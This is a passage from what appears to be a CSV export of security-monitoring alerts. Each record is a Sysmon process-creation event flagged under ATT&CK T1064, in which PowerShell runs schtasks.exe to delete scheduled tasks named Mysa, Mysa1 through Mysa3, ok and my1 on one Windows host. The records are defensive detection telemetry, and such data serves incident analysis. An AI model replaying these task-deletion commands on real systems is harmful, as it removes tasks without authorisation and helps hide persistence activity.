Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.162",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.776 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ba8a2100} +ProcessId: 6012 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.783321400Z"",""eventRecordID"":""2789"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.776\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ba8a2100}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.776"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010ba8a2100}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.098",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.649 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010bb872100} +ProcessId: 380 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft 
Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.691612800Z"",""eventRecordID"":""2788"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.649\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010bb872100}\r\nProcessId: 380\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 
0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.649"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010bb872100}"",""processId"":""380"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.489 +ProcessGuid: 
{df9fc3d3-b396-5ecf-0000-0010e9852100} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.498329000Z"",""eventRecordID"":""2787"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.489\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9852100}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.489"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e9852100}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.058",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.446 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00100c842100} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.452389600Z"",""eventRecordID"":""2786"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.446\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00100c842100}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.446"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00100c842100}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.042",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.414 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00103a822100} +ProcessId: 2328 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.418786100Z"",""eventRecordID"":""2785"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.414\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00103a822100}\r\nProcessId: 2328\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:30.414"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00103a822100}"",""processId"":""2328"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.037",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.373 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001063802100} +ProcessId: 7896 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.375823600Z"",""eventRecordID"":""2784"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.373\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001063802100}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.373"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001063802100}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 